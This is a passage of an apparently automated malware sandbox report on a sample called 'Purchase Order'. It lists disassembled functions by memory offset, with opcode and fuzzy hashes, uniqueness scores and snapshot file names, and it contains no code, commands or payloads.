                                                                                                            Uniqueness Score: -1.00%

                                                                                                            Function 094B36C0 Relevance: .1, Instructions: 110COMMON
                                                                                                            Download Yara Rule
                                                                                                            Memory Dump Source
                                                                                                            • Source File: 00000000.00000002.1737500638.00000000094B0000.00000040.00000800.00020000.00000000.sdmp, Offset: 094B0000, based on PE: false
                                                                                                            Joe Sandbox IDA Plugin
                                                                                                            • Snapshot File: hcaresult_0_2_94b0000_Purchase Order.jbxd
                                                                                                            Similarity
                                                                                                            • API ID:
                                                                                                            • String ID:
                                                                                                            • API String ID:
                                                                                                            • Opcode ID: 0cfc060d4721fc87836c14eb73ace6e0547a730c5db14597c09d2f7986976257
                                                                                                            • Instruction ID: 486f3bae92e26ecda4e74d1e93704f7248533a0a5410b65702dde5d706000c1c
                                                                                                            • Opcode Fuzzy Hash: 0cfc060d4721fc87836c14eb73ace6e0547a730c5db14597c09d2f7986976257
                                                                                                            • Instruction Fuzzy Hash: C441FF75E022189FCB00DFA9D884AEEBBB1FB4C320F109565E814B7354DB31A995CFA0
                                                                                                            Uniqueness

                                                                                                            Uniqueness Score: -1.00%

                                                                                                            Function 094B3818 Relevance: .1, Instructions: 99COMMON
                                                                                                            Download Yara Rule
                                                                                                            Memory Dump Source
                                                                                                            • Source File: 00000000.00000002.1737500638.00000000094B0000.00000040.00000800.00020000.00000000.sdmp, Offset: 094B0000, based on PE: false
                                                                                                            Joe Sandbox IDA Plugin
                                                                                                            • Snapshot File: hcaresult_0_2_94b0000_Purchase Order.jbxd
                                                                                                            Similarity
                                                                                                            • API ID:
                                                                                                            • String ID:
                                                                                                            • API String ID:
                                                                                                            • Opcode ID: 4b3578f21531c13724f2c2f8444fce10a89f0d342d70afc57287b705551193f7
                                                                                                            • Instruction ID: d91dc19f12d32d036b6d7524dd571df5224c43174f22459215cdae9dcb3d13f2
                                                                                                            • Opcode Fuzzy Hash: 4b3578f21531c13724f2c2f8444fce10a89f0d342d70afc57287b705551193f7
                                                                                                            • Instruction Fuzzy Hash: 6E410975E012089FDB44CFA9D980AEDFBF2EF88300F14906AE819A7344DB359946CB64
                                                                                                            Uniqueness

                                                                                                            Uniqueness Score: -1.00%

                                                                                                            Function 094B5B64 Relevance: .1, Instructions: 97COMMON
                                                                                                            Download Yara Rule
                                                                                                            Memory Dump Source
                                                                                                            • Source File: 00000000.00000002.1737500638.00000000094B0000.00000040.00000800.00020000.00000000.sdmp, Offset: 094B0000, based on PE: false
                                                                                                            Joe Sandbox IDA Plugin
                                                                                                            • Snapshot File: hcaresult_0_2_94b0000_Purchase Order.jbxd
                                                                                                            Similarity
                                                                                                            • API ID:
                                                                                                            • String ID:
                                                                                                            • API String ID:
                                                                                                            • Opcode ID: 024c441b10c5bf055b772b8f1eec75084fa229746bd32a53cc0317a1be4a2c1c
                                                                                                            • Instruction ID: b74b635ab42b38c05273aef28d07139807ea77285467394162171f7b2c171a65
                                                                                                            • Opcode Fuzzy Hash: 024c441b10c5bf055b772b8f1eec75084fa229746bd32a53cc0317a1be4a2c1c
                                                                                                            • Instruction Fuzzy Hash: B4313AB69002099FCF14DFA9D885ADEBFF5EF48320F14842AE915E7350D735A944CBA4
                                                                                                            Uniqueness

                                                                                                            Uniqueness Score: -1.00%

                                                                                                            Function 094B2547 Relevance: .1, Instructions: 94COMMON
                                                                                                            Download Yara Rule
                                                                                                            Memory Dump Source
                                                                                                            • Source File: 00000000.00000002.1737500638.00000000094B0000.00000040.00000800.00020000.00000000.sdmp, Offset: 094B0000, based on PE: false
                                                                                                            Joe Sandbox IDA Plugin
                                                                                                            • Snapshot File: hcaresult_0_2_94b0000_Purchase Order.jbxd
                                                                                                            Similarity
                                                                                                            • API ID:
                                                                                                            • String ID:
                                                                                                            • API String ID:
                                                                                                            • Opcode ID: 0787e119259b2794056b174d505c36c4c0ea04c6ecbcde409d42ce11e8018a79
                                                                                                            • Instruction ID: 226425c4e1411f9a88dfd8464c17fab3a9a35b276bf56c0b6c938c53e4c05cc6
                                                                                                            • Opcode Fuzzy Hash: 0787e119259b2794056b174d505c36c4c0ea04c6ecbcde409d42ce11e8018a79
                                                                                                            • Instruction Fuzzy Hash: 0B21A36201A2B656E30AAF7CD8B17DA3F20DF52365F046883C4A64E552CD75408AE2EE
                                                                                                            Uniqueness

                                                                                                            Uniqueness Score: -1.00%

                                                                                                            Function 094BD649 Relevance: .1, Instructions: 93COMMON
                                                                                                            Download Yara Rule
                                                                                                            Memory Dump Source
                                                                                                            • Source File: 00000000.00000002.1737500638.00000000094B0000.00000040.00000800.00020000.00000000.sdmp, Offset: 094B0000, based on PE: false
                                                                                                            Joe Sandbox IDA Plugin
                                                                                                            • Snapshot File: hcaresult_0_2_94b0000_Purchase Order.jbxd
                                                                                                            Similarity
                                                                                                            • API ID:
                                                                                                            • String ID:
                                                                                                            • API String ID:
                                                                                                            • Opcode ID: 377c3f953c50979c4b4e530b291e2b523ddaf92b56bac6d46e83368cd16bad6a
                                                                                                            • Instruction ID: e0a7c58757c4e80eae6c57556739ed66847292bb7212df638310a74479972a9d
                                                                                                            • Opcode Fuzzy Hash: 377c3f953c50979c4b4e530b291e2b523ddaf92b56bac6d46e83368cd16bad6a
                                                                                                            • Instruction Fuzzy Hash: 5C413CB4E09204CFC704DF68E65899E7FFAFB48345B04A595E4099F291DB30AC82DF65
                                                                                                            Uniqueness

                                                                                                            Uniqueness Score: -1.00%

                                                                                                            Function 05869678 Relevance: .1, Instructions: 92COMMON
                                                                                                            Download Yara Rule
                                                                                                            Memory Dump Source
                                                                                                            • Source File: 00000000.00000002.1735921052.0000000005860000.00000040.00000800.00020000.00000000.sdmp, Offset: 05860000, based on PE: false
                                                                                                            Joe Sandbox IDA Plugin
                                                                                                            • Snapshot File: hcaresult_0_2_5860000_Purchase Order.jbxd
                                                                                                            Similarity
                                                                                                            • API ID:
                                                                                                            • String ID:
                                                                                                            • API String ID:
                                                                                                            • Opcode ID: b55ae7aec50ff6cd9659a0a1793437683b96a212471f1ba1b79b1b6cceb29be5
                                                                                                            • Instruction ID: 4c9ea26d23bafac542b8ae0bd45d47cfa304afea3d18fcf97b3eba753b4728c7
                                                                                                            • Opcode Fuzzy Hash: b55ae7aec50ff6cd9659a0a1793437683b96a212471f1ba1b79b1b6cceb29be5
                                                                                                            • Instruction Fuzzy Hash: 57319C35A00219CBCB04CF68D9845BFBBB6FF85701B148866EC05EB256E634DD56CB91
                                                                                                            Uniqueness

                                                                                                            Uniqueness Score: -1.00%

                                                                                                            Function 094B5BF0 Relevance: .1, Instructions: 90COMMON
                                                                                                            Download Yara Rule
                                                                                                            Memory Dump Source
                                                                                                            • Source File: 00000000.00000002.1737500638.00000000094B0000.00000040.00000800.00020000.00000000.sdmp, Offset: 094B0000, based on PE: false
                                                                                                            Joe Sandbox IDA Plugin
                                                                                                            • Snapshot File: hcaresult_0_2_94b0000_Purchase Order.jbxd
                                                                                                            Similarity
                                                                                                            • API ID:
                                                                                                            • String ID:
                                                                                                            • API String ID:
                                                                                                            • Opcode ID: 06f0ae5192f071880b14c47c6770351dc434ce918bfc4da3c066aad05b935724
                                                                                                            • Instruction ID: c347605e4aef543ba117364ec862d43cbde843ee8558b4adbf8dbf1e42ae28f5
                                                                                                            • Opcode Fuzzy Hash: 06f0ae5192f071880b14c47c6770351dc434ce918bfc4da3c066aad05b935724
                                                                                                            • Instruction Fuzzy Hash: C1214BA2A082654BDB01AF6CDCE05DFBFB5DF95220B14185BE585CF202DD308509C3F6
                                                                                                            Uniqueness

                                                                                                            Uniqueness Score: -1.00%

                                                                                                            Function 094B1548 Relevance: .1, Instructions: 86COMMON
                                                                                                            Download Yara Rule
                                                                                                            Memory Dump Source
                                                                                                            • Source File: 00000000.00000002.1737500638.00000000094B0000.00000040.00000800.00020000.00000000.sdmp, Offset: 094B0000, based on PE: false
                                                                                                            Joe Sandbox IDA Plugin
                                                                                                            • Snapshot File: hcaresult_0_2_94b0000_Purchase Order.jbxd
                                                                                                            Similarity
                                                                                                            • API ID:
                                                                                                            • String ID:
                                                                                                            • API String ID:
                                                                                                            • Opcode ID: e665a0d06a923833d852c6480ba6621fa2ea742c30996f5370195051016290c8
                                                                                                            • Instruction ID: 97c8ac2567f67afccfdd608f92314365a163d2ecb3693217d4a177c52c13d0ad
                                                                                                            • Opcode Fuzzy Hash: e665a0d06a923833d852c6480ba6621fa2ea742c30996f5370195051016290c8
                                                                                                            • Instruction Fuzzy Hash: 052190367142018FCB18DB7CD4589AE77E9EFC866071540AAE90ACB361DE31DC01CBB1
                                                                                                            Uniqueness

                                                                                                            Uniqueness Score: -1.00%

                                                                                                            Function 094BBB80 Relevance: .1, Instructions: 85COMMON
                                                                                                            Download Yara Rule
                                                                                                            Memory Dump Source
                                                                                                            • Source File: 00000000.00000002.1737500638.00000000094B0000.00000040.00000800.00020000.00000000.sdmp, Offset: 094B0000, based on PE: false
                                                                                                            Joe Sandbox IDA Plugin
                                                                                                            • Snapshot File: hcaresult_0_2_94b0000_Purchase Order.jbxd
                                                                                                            Similarity
                                                                                                            • API ID:
                                                                                                            • String ID:
                                                                                                            • API String ID:
                                                                                                            • Opcode ID: 1555382af996cc074e241e76214decc7efc5ec8a46f9761ceb71673ef994b155
                                                                                                            • Instruction ID: ef63b8f83601cf7a77e85d6a4d6664783067bf55134d17b47ca09911affa73c7
                                                                                                            • Opcode Fuzzy Hash: 1555382af996cc074e241e76214decc7efc5ec8a46f9761ceb71673ef994b155
                                                                                                            • Instruction Fuzzy Hash: 7931E974D19218CFDB04CFA9C9905EDBBFAFB8D340F14916AD409AB215DB359A42CF60
                                                                                                            Uniqueness

                                                                                                            Uniqueness Score: -1.00%

                                                                                                            Function 094BBBD5 Relevance: .1, Instructions: 84COMMON
                                                                                                            Download Yara Rule
                                                                                                            Memory Dump Source
                                                                                                            • Source File: 00000000.00000002.1737500638.00000000094B0000.00000040.00000800.00020000.00000000.sdmp, Offset: 094B0000, based on PE: false
                                                                                                            Joe Sandbox IDA Plugin
                                                                                                            • Snapshot File: hcaresult_0_2_94b0000_Purchase Order.jbxd
                                                                                                            Similarity
                                                                                                            • API ID:
                                                                                                            • String ID:
                                                                                                            • API String ID:
                                                                                                            • Opcode ID: bdf5488031168984dae02d04b95fa22a03cee661272eeeaf86ab9de52dbda438
                                                                                                            • Instruction ID: 6842a7efbaa351ba84f74615f558183968ea85ae8ecfe6a11272f43d03c378af
                                                                                                            • Opcode Fuzzy Hash: bdf5488031168984dae02d04b95fa22a03cee661272eeeaf86ab9de52dbda438
                                                                                                            • Instruction Fuzzy Hash: B1318070919248CFCB09CF69C9545EDBFF9FF4A301B1491AAD405AB266CB359943CF20
                                                                                                            Uniqueness

                                                                                                            Uniqueness Score: -1.00%

                                                                                                            Function 094BFB50 Relevance: .1, Instructions: 80COMMON
                                                                                                            Download Yara Rule
                                                                                                            Memory Dump Source
                                                                                                            • Source File: 00000000.00000002.1737500638.00000000094B0000.00000040.00000800.00020000.00000000.sdmp, Offset: 094B0000, based on PE: false
                                                                                                            Joe Sandbox IDA Plugin
                                                                                                            • Snapshot File: hcaresult_0_2_94b0000_Purchase Order.jbxd
                                                                                                            Similarity
                                                                                                            • API ID:
                                                                                                            • String ID:
                                                                                                            • API String ID:
                                                                                                            • Opcode ID: 008c46e2b6409c3f54473a80f7ec7db60849291d069eecea401b276cb1a1724e
                                                                                                            • Instruction ID: bc9460693cde0c493f3b4d5beae0d58895ded093bd4987684847414af0483fce
                                                                                                            • Opcode Fuzzy Hash: 008c46e2b6409c3f54473a80f7ec7db60849291d069eecea401b276cb1a1724e
                                                                                                            • Instruction Fuzzy Hash: B1218E30A001189BDB44EFB9D8646EEBBB2FF88310F50416AE506A7284DB315D45CB71
                                                                                                            Uniqueness

                                                                                                            Uniqueness Score: -1.00%

                                                                                                            Function 094B6DD0 Relevance: .1, Instructions: 76COMMON
                                                                                                            Download Yara Rule
                                                                                                            Memory Dump Source
                                                                                                            • Source File: 00000000.00000002.1737500638.00000000094B0000.00000040.00000800.00020000.00000000.sdmp, Offset: 094B0000, based on PE: false
                                                                                                            Joe Sandbox IDA Plugin
                                                                                                            • Snapshot File: hcaresult_0_2_94b0000_Purchase Order.jbxd
                                                                                                            Similarity
                                                                                                            • API ID:
                                                                                                            • String ID:
                                                                                                            • API String ID:
                                                                                                            • Opcode ID: df94f00e223a4d7f0540b7a68c1b42e749975fa71d2240651889df5eacbb2cb3
                                                                                                            • Instruction ID: 1b7bc72b48a698a056b5aedbeaa8fc52ebd7252fd169dc414691ef5f593110e0
                                                                                                            • Opcode Fuzzy Hash: df94f00e223a4d7f0540b7a68c1b42e749975fa71d2240651889df5eacbb2cb3
                                                                                                            • Instruction Fuzzy Hash: 9B317DB5D04219DFCF01CFE8C940AEEBBB2BB49351F11442AE919BB304E77569468BA0
                                                                                                            Uniqueness

                                                                                                            Uniqueness Score: -1.00%

                                                                                                            Function 094B0358 Relevance: .1, Instructions: 76COMMON
                                                                                                            Download Yara Rule
                                                                                                            Memory Dump Source
                                                                                                            • Source File: 00000000.00000002.1737500638.00000000094B0000.00000040.00000800.00020000.00000000.sdmp, Offset: 094B0000, based on PE: false
                                                                                                            Joe Sandbox IDA Plugin
                                                                                                            • Snapshot File: hcaresult_0_2_94b0000_Purchase Order.jbxd
                                                                                                            Similarity
                                                                                                            • API ID:
                                                                                                            • String ID:
                                                                                                            • API String ID:
                                                                                                            • Opcode ID: f73b8e150743501dd351b5cf4dc5ee66fa96dfd83886b5d6436ff4123055a20d
                                                                                                            • Instruction ID: ca3ab1c00d057c68a5fbeb1cb2651fc06e0f72e0f3a6ce57c9096df8a06d943b
                                                                                                            • Opcode Fuzzy Hash: f73b8e150743501dd351b5cf4dc5ee66fa96dfd83886b5d6436ff4123055a20d
                                                                                                            • Instruction Fuzzy Hash: F3219A303006008FCB68DB38C858A6B77E5EF85716B1191AEE506DF3A5DB72DC42CB61
                                                                                                            Uniqueness

                                                                                                            Uniqueness Score: -1.00%

                                                                                                            Function 018AD4C4 Relevance: .1, Instructions: 75COMMON
                                                                                                            Download Yara Rule
                                                                                                            Memory Dump Source
                                                                                                            • Source File: 00000000.00000002.1731570703.00000000018AD000.00000040.00000800.00020000.00000000.sdmp, Offset: 018AD000, based on PE: false
                                                                                                            Joe Sandbox IDA Plugin
                                                                                                            • Snapshot File: hcaresult_0_2_18ad000_Purchase Order.jbxd
                                                                                                            Similarity
                                                                                                            • API ID:
                                                                                                            • String ID:
                                                                                                            • API String ID:
                                                                                                            • Opcode ID: 37a58c2db29626568ce9f3e5a4c797975f3b97dd80c06814ec013f2cb9534b3f
                                                                                                            • Instruction ID: 678e8188b8d04fe152dcf6ec9e4f46d7d404a9a53f268286c23b1449b0016272
                                                                                                            • Opcode Fuzzy Hash: 37a58c2db29626568ce9f3e5a4c797975f3b97dd80c06814ec013f2cb9534b3f
                                                                                                            • Instruction Fuzzy Hash: 342145B1504204DFEB05DF58C9C0B26BF65FB88318F64C669E949CB656C336D506CBA1
                                                                                                            Uniqueness

                                                                                                            Uniqueness Score: -1.00%

                                                                                                            Function 018AD3D8 Relevance: .1, Instructions: 75COMMON
                                                                                                            Download Yara Rule
                                                                                                            Memory Dump Source
                                                                                                            • Source File: 00000000.00000002.1731570703.00000000018AD000.00000040.00000800.00020000.00000000.sdmp, Offset: 018AD000, based on PE: false
                                                                                                            Joe Sandbox IDA Plugin
                                                                                                            • Snapshot File: hcaresult_0_2_18ad000_Purchase Order.jbxd
                                                                                                            Similarity
                                                                                                            • API ID:
                                                                                                            • String ID:
                                                                                                            • API String ID:
                                                                                                            • Opcode ID: 3e8a9cad5ec1ac3f5417c14761a28dcad25acb852d0cc2f5e42b789b556fadf7
                                                                                                            • Instruction ID: 35c04ae380513907e3b0c32472316cdb9ed0097089ff2755bb4766b3fb864c85
                                                                                                            • Opcode Fuzzy Hash: 3e8a9cad5ec1ac3f5417c14761a28dcad25acb852d0cc2f5e42b789b556fadf7
                                                                                                            • Instruction Fuzzy Hash: D32145B1104204DFEB05DF48C9C0B66BF65FB88324F60C66DE90ACB656C33AE546CBA1
                                                                                                            Uniqueness

                                                                                                            Uniqueness Score: -1.00%

                                                                                                            Function 094B6DE0 Relevance: .1, Instructions: 74COMMON
                                                                                                            Download Yara Rule
                                                                                                            Memory Dump Source
                                                                                                            • Source File: 00000000.00000002.1737500638.00000000094B0000.00000040.00000800.00020000.00000000.sdmp, Offset: 094B0000, based on PE: false
                                                                                                            Joe Sandbox IDA Plugin
                                                                                                            • Snapshot File: hcaresult_0_2_94b0000_Purchase Order.jbxd
                                                                                                            Similarity
                                                                                                            • API ID:
                                                                                                            • String ID:
                                                                                                            • API String ID:
                                                                                                            • Opcode ID: 79cf538f900abf69ecd7cb11ea60d2611f64c276051769589551a877811bf74a
                                                                                                            • Instruction ID: 30e3d4ffe712af71f49af3f060a59bfb4ae03e78021918760b3c78a92af34b08
                                                                                                            • Opcode Fuzzy Hash: 79cf538f900abf69ecd7cb11ea60d2611f64c276051769589551a877811bf74a
                                                                                                            • Instruction Fuzzy Hash: FF216C75D0525ADFCF01CFA8C9409EEBBB2FB49350F11442AE919BB304D77569468BA0
                                                                                                            Uniqueness

                                                                                                            Uniqueness Score: -1.00%

                                                                                                            Function 0586A2E0 Relevance: .1, Instructions: 74COMMON
                                                                                                            Download Yara Rule
                                                                                                            Memory Dump Source
                                                                                                            • Source File: 00000000.00000002.1735921052.0000000005860000.00000040.00000800.00020000.00000000.sdmp, Offset: 05860000, based on PE: false
                                                                                                            Joe Sandbox IDA Plugin
                                                                                                            • Snapshot File: hcaresult_0_2_5860000_Purchase Order.jbxd
                                                                                                            Similarity
                                                                                                            • API ID:
                                                                                                            • String ID:
                                                                                                            • API String ID:
                                                                                                            • Opcode ID: 0eb8969f7c9aaafed9429e88cec4048968271517d54d970c7b8c788374bcb28e
                                                                                                            • Instruction ID: 0725979ad5e1ba75c8311565e3b75a09d990dde5a2cbbcbf01646822247c855f
                                                                                                            • Opcode Fuzzy Hash: 0eb8969f7c9aaafed9429e88cec4048968271517d54d970c7b8c788374bcb28e
                                                                                                            • Instruction Fuzzy Hash: 3A213736600611DBCB059FA8D98867EB7A7FB84311F518425ED06DB6C1EB38DC42C7E2
                                                                                                            Uniqueness

                                                                                                            Uniqueness Score: -1.00%

                                                                                                            Function 018BD01C Relevance: .1, Instructions: 72COMMON
                                                                                                            Download Yara Rule
                                                                                                            Memory Dump Source
                                                                                                            • Source File: 00000000.00000002.1731861869.00000000018BD000.00000040.00000800.00020000.00000000.sdmp, Offset: 018BD000, based on PE: false
                                                                                                            Joe Sandbox IDA Plugin
                                                                                                            • Snapshot File: hcaresult_0_2_18bd000_Purchase Order.jbxd
                                                                                                            Similarity
                                                                                                            • API ID:
                                                                                                            • String ID:
                                                                                                            • API String ID:
                                                                                                            • Opcode ID: 21f7fcc60c2c2a03047c303fdd627dd640b685db2f05428abcd6e04edf4f07bb
                                                                                                            • Instruction ID: 8bfe51262b63b19274d2d3653c65a683eba5a1f83704c3e12a98f94744c3da3c
                                                                                                            • Opcode Fuzzy Hash: 21f7fcc60c2c2a03047c303fdd627dd640b685db2f05428abcd6e04edf4f07bb
                                                                                                            • Instruction Fuzzy Hash: 142134B5604204EFCB15DF58D9C0B26BF65FB88358F24CA6DE90A8B346C33AD507CA61
                                                                                                            Uniqueness

                                                                                                            Uniqueness Score: -1.00%

                                                                                                            Function 018BD1D4 Relevance: .1, Instructions: 72COMMON
                                                                                                            Download Yara Rule
                                                                                                            Memory Dump Source
                                                                                                            • Source File: 00000000.00000002.1731861869.00000000018BD000.00000040.00000800.00020000.00000000.sdmp, Offset: 018BD000, based on PE: false
                                                                                                            Joe Sandbox IDA Plugin
                                                                                                            • Snapshot File: hcaresult_0_2_18bd000_Purchase Order.jbxd
                                                                                                            Similarity
                                                                                                            • API ID:
                                                                                                            • String ID:
                                                                                                            • API String ID:
                                                                                                            • Opcode ID: 81d4718886904a677a366d6a9c985cb24fcfb6d29ea62a720bf026d0fdb39ba6
                                                                                                            • Instruction ID: dc3a5f01a81b85c5cd588d681c8e274af743f6b679d8d9f20679a1095e0c2410
                                                                                                            • Opcode Fuzzy Hash: 81d4718886904a677a366d6a9c985cb24fcfb6d29ea62a720bf026d0fdb39ba6
                                                                                                            • Instruction Fuzzy Hash: 2C2125B1504244EFDB05DF98C5C0B26BB65FB8432CF20C66DE9098B352C336E506CB61
                                                                                                            Uniqueness

                                                                                                            Uniqueness Score: -1.00%

                                                                                                            Function 094B2640 Relevance: .1, Instructions: 70COMMON
                                                                                                            Download Yara Rule
                                                                                                            Memory Dump Source
                                                                                                            • Source File: 00000000.00000002.1737500638.00000000094B0000.00000040.00000800.00020000.00000000.sdmp, Offset: 094B0000, based on PE: false
                                                                                                            Joe Sandbox IDA Plugin
                                                                                                            • Snapshot File: hcaresult_0_2_94b0000_Purchase Order.jbxd
                                                                                                            Similarity
                                                                                                            • API ID:
                                                                                                            • String ID:
                                                                                                            • API String ID:
                                                                                                            • Opcode ID: f30b944c0e051bea6a0d508e3fdf43033d25db05cd430b1a1ab38ea0d2bc2165
                                                                                                            • Instruction ID: d0caca626e7e1c28fdbc86587a070d50ab3f99143b6eafbbd9e0753c70e3343f
                                                                                                            • Opcode Fuzzy Hash: f30b944c0e051bea6a0d508e3fdf43033d25db05cd430b1a1ab38ea0d2bc2165
                                                                                                            • Instruction Fuzzy Hash: 042158B1D097C84FDB19CFBA8D1429DBFF29F85204F18C06BC458EB2A6D6340446CB51
                                                                                                            Uniqueness

                                                                                                            Uniqueness Score: -1.00%

                                                                                                            Function 094B33D0 Relevance: .1, Instructions: 69COMMON
                                                                                                            Download Yara Rule
                                                                                                            Memory Dump Source
                                                                                                            • Source File: 00000000.00000002.1737500638.00000000094B0000.00000040.00000800.00020000.00000000.sdmp, Offset: 094B0000, based on PE: false
                                                                                                            Joe Sandbox IDA Plugin
                                                                                                            • Snapshot File: hcaresult_0_2_94b0000_Purchase Order.jbxd
                                                                                                            Similarity
                                                                                                            • API ID:
                                                                                                            • String ID:
                                                                                                            • API String ID:
                                                                                                            • Opcode ID: 05d59cd778944829f68ce3bc82166d631e9c24cd75f206be1c59f046c668b044
                                                                                                            • Instruction ID: e62262272ab306bcb9ac1c3fd12228a4acf0790dccb017ee6ab11ceb879e7c95
                                                                                                            • Opcode Fuzzy Hash: 05d59cd778944829f68ce3bc82166d631e9c24cd75f206be1c59f046c668b044
                                                                                                            • Instruction Fuzzy Hash: 0921F0B4A1150CDFC740CF95E5898ADBBF0FF49320B5240C5E894AB366EB31EA62CB15
                                                                                                            Uniqueness

                                                                                                            Uniqueness Score: -1.00%

                                                                                                            Function 094B74A1 Relevance: .1, Instructions: 69COMMON
                                                                                                            Download Yara Rule
                                                                                                            Memory Dump Source
                                                                                                            • Source File: 00000000.00000002.1737500638.00000000094B0000.00000040.00000800.00020000.00000000.sdmp, Offset: 094B0000, based on PE: false
                                                                                                            Joe Sandbox IDA Plugin
                                                                                                            • Snapshot File: hcaresult_0_2_94b0000_Purchase Order.jbxd
                                                                                                            Similarity
                                                                                                            • API ID:
                                                                                                            • String ID:
                                                                                                            • API String ID:
                                                                                                            • Opcode ID: 962fca18285adb6a9ceafe3c7ef14af846d71b59c55285891df615634e071aa9
                                                                                                            • Instruction ID: 15c51194ee7ea13d78ef84646e88e35411c219aff4a33c562544fdfff634bc59
                                                                                                            • Opcode Fuzzy Hash: 962fca18285adb6a9ceafe3c7ef14af846d71b59c55285891df615634e071aa9
                                                                                                            • Instruction Fuzzy Hash: 0421C374D092298FDB64CF68C884BEDBBB5BB49350F1094D6D50DEB741EA319A86CF20
                                                                                                            Uniqueness

                                                                                                            Uniqueness Score: -1.00%

                                                                                                            Function 094BBB59 Relevance: .1, Instructions: 66COMMON
                                                                                                            Download Yara Rule
                                                                                                            Memory Dump Source
                                                                                                            • Source File: 00000000.00000002.1737500638.00000000094B0000.00000040.00000800.00020000.00000000.sdmp, Offset: 094B0000, based on PE: false
                                                                                                            Joe Sandbox IDA Plugin
                                                                                                            • Snapshot File: hcaresult_0_2_94b0000_Purchase Order.jbxd
                                                                                                            Similarity
                                                                                                            • API ID:
                                                                                                            • String ID:
                                                                                                            • API String ID:
                                                                                                            • Opcode ID: 71986063bb5c8c36d8e84191a25a13734d2d7fff6b8808e2d3d429ce4c569bf2
                                                                                                            • Instruction ID: b1101ff551a24bc5ceee9fe2aee3b81dde62752533e6db7d25a023a34b81a932
                                                                                                            • Opcode Fuzzy Hash: 71986063bb5c8c36d8e84191a25a13734d2d7fff6b8808e2d3d429ce4c569bf2
                                                                                                            • Instruction Fuzzy Hash: F0215E70919218CFDB49CF69C9545EDBFF6FF8D340B1485AAD40AAB262CB354902CF20
                                                                                                            Uniqueness

                                                                                                            Uniqueness Score: -1.00%

                                                                                                            Function 094BEED8 Relevance: .1, Instructions: 65COMMON
                                                                                                            Download Yara Rule
                                                                                                            Memory Dump Source
                                                                                                            • Source File: 00000000.00000002.1737500638.00000000094B0000.00000040.00000800.00020000.00000000.sdmp, Offset: 094B0000, based on PE: false
                                                                                                            Joe Sandbox IDA Plugin
                                                                                                            • Snapshot File: hcaresult_0_2_94b0000_Purchase Order.jbxd
                                                                                                            Similarity
                                                                                                            • API ID:
                                                                                                            • String ID:
                                                                                                            • API String ID:
                                                                                                            • Opcode ID: 802aab673c701e193d7ca50df45e074446007864c93cb340e463c398c9dfeb1b
                                                                                                            • Instruction ID: 1ede5c9289b40ff4f49d0200b7baa7b493ee19e6598073e8c796e3671e47dd63
                                                                                                            • Opcode Fuzzy Hash: 802aab673c701e193d7ca50df45e074446007864c93cb340e463c398c9dfeb1b
                                                                                                            • Instruction Fuzzy Hash: 8811B634F00115ABCB689EB9D8456FF76A6FFC4750F14812AEA06DB340DB30894287F1
                                                                                                            Uniqueness

                                                                                                            Uniqueness Score: -1.00%

                                                                                                            Function 094B7BEC Relevance: .1, Instructions: 64COMMON
                                                                                                            Download Yara Rule
                                                                                                            Memory Dump Source
                                                                                                            • Source File: 00000000.00000002.1737500638.00000000094B0000.00000040.00000800.00020000.00000000.sdmp, Offset: 094B0000, based on PE: false
                                                                                                            Joe Sandbox IDA Plugin
                                                                                                            • Snapshot File: hcaresult_0_2_94b0000_Purchase Order.jbxd
                                                                                                            Similarity
                                                                                                            • API ID:
                                                                                                            • String ID:
                                                                                                            • API String ID:
                                                                                                            • Opcode ID: 3be88cb1beac57e50ba8d54b773ba3733b30ba04ad20cd1eeb946ba73c76815d
                                                                                                            • Instruction ID: 07605497bd41732c35cdfa58fc877ed17b67fbd04656a6b34d8cf0d99657b97e
                                                                                                            • Opcode Fuzzy Hash: 3be88cb1beac57e50ba8d54b773ba3733b30ba04ad20cd1eeb946ba73c76815d
                                                                                                            • Instruction Fuzzy Hash: 3511FCB5D0D14ACFDB00CFA8C5604EEBBF5EB89395B04946BD406ABA15E73599028F70
                                                                                                            Uniqueness

                                                                                                            Uniqueness Score: -1.00%

                                                                                                            Function 094BABA8 Relevance: .1, Instructions: 64COMMON
                                                                                                            Download Yara Rule
                                                                                                            Memory Dump Source
                                                                                                            • Source File: 00000000.00000002.1737500638.00000000094B0000.00000040.00000800.00020000.00000000.sdmp, Offset: 094B0000, based on PE: false
                                                                                                            Joe Sandbox IDA Plugin
                                                                                                            • Snapshot File: hcaresult_0_2_94b0000_Purchase Order.jbxd
                                                                                                            Similarity
                                                                                                            • API ID:
                                                                                                            • String ID:
                                                                                                            • API String ID:
                                                                                                            • Opcode ID: 896a28931d3fb3856f8c6a3c448f1edb8857e0afef33ed75555907c87ac10d9c
                                                                                                            • Instruction ID: 49353fcbab51132039516965d23e831188dffc51691ebde61c6e4c3f10afafe3
                                                                                                            • Opcode Fuzzy Hash: 896a28931d3fb3856f8c6a3c448f1edb8857e0afef33ed75555907c87ac10d9c
                                                                                                            • Instruction Fuzzy Hash: FC214CB4909209CFCB40CFA8C191AEEBFF5FF49310F20519AD815AB711C7319A42CBA1
                                                                                                            Uniqueness

                                                                                                            Uniqueness Score: -1.00%

                                                                                                            Function 0586A540 Relevance: .1, Instructions: 64COMMON
                                                                                                            Download Yara Rule
                                                                                                            Memory Dump Source
                                                                                                            • Source File: 00000000.00000002.1735921052.0000000005860000.00000040.00000800.00020000.00000000.sdmp, Offset: 05860000, based on PE: false
                                                                                                            Joe Sandbox IDA Plugin
                                                                                                            • Snapshot File: hcaresult_0_2_5860000_Purchase Order.jbxd
                                                                                                            Similarity
                                                                                                            • API ID:
                                                                                                            • String ID:
                                                                                                            • API String ID:
                                                                                                            • Opcode ID: 67a188509f148aa8357a906bb2755aacfa79f4726f42c6dc181babcb953588b8
                                                                                                            • Instruction ID: 5e6bcf4018357028eee03688c58d926b70c34c2e971177456121219b00e2ad17
                                                                                                            • Opcode Fuzzy Hash: 67a188509f148aa8357a906bb2755aacfa79f4726f42c6dc181babcb953588b8
                                                                                                            • Instruction Fuzzy Hash: D72147B5A0061ACBCF00CF98D9845BEBBB6FF44201B148426EC05EB256E634DD55CBA1
                                                                                                            Uniqueness

                                                                                                            Uniqueness Score: -1.00%

                                                                                                            Function 018BD006 Relevance: .1, Instructions: 63COMMON
                                                                                                            Download Yara Rule
                                                                                                            Memory Dump Source
                                                                                                            • Source File: 00000000.00000002.1731861869.00000000018BD000.00000040.00000800.00020000.00000000.sdmp, Offset: 018BD000, based on PE: false
                                                                                                            Joe Sandbox IDA Plugin
                                                                                                            • Snapshot File: hcaresult_0_2_18bd000_Purchase Order.jbxd
                                                                                                            Similarity
                                                                                                            • API ID:
                                                                                                            • String ID:
                                                                                                            • API String ID:
                                                                                                            • Opcode ID: b401572ab7c7f067e0857001d96a59c113b0200e732b3194a3574c1bca7675d0
